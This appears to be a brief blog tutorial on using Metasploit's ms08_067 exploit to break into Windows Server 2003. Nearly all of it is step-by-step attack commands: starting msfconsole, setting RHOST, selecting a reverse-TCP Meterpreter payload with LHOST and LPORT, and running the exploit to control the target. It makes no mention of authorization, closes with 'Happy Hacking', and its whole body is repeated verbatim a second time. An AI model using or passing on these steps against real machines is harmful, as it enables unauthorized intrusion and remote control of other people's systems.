Execute following commands in terminal to start the Metasploit framework
service postgresql start
msfconsole
or simply click on Metasploit Framework icon in dork
Search for exploit ms08_067 using the search command
search <Exploit Code>
To configure exploit, enter the below command
use <exploit path>
Verify exploit options using show options command; it is observed that we need to set RHOST. Execute set RHOST <IP address> to set RHOST value.
Choose a suitable payload by executing show payloads command and set payload using set PAYLOAD windows/meterpreter/reverse_tcp_allports command and verify payload options.
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>
Make sure to verify exploit and payload options, if everything is configured correctly then execute the exploit command to gain access to the target machine. Wait for reverse connection, as we have selected meterpreter payload, we gain meterpreter access using which we can control target computer.
By executing the above commands you can able to hack a windows server 2003 if there is any vulnerability in the windows server.
Happy Hacking:)
service postgresql start
msfconsole
or simply click on Metasploit Framework icon in dork
Search for exploit ms08_067 using the search command
search <Exploit Code>
To configure exploit, enter the below command
use <exploit path>
Verify exploit options using show options command; it is observed that we need to set RHOST. Execute set RHOST <IP address> to set RHOST value.
Choose a suitable payload by executing show payloads command and set payload using set PAYLOAD windows/meterpreter/reverse_tcp_allports command and verify payload options.
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>
Make sure to verify exploit and payload options, if everything is configured correctly then execute the exploit command to gain access to the target machine. Wait for reverse connection, as we have selected meterpreter payload, we gain meterpreter access using which we can control target computer.
By executing the above commands you can able to hack a windows server 2003 if there is any vulnerability in the windows server.
Happy Hacking:)
No comments:
Post a Comment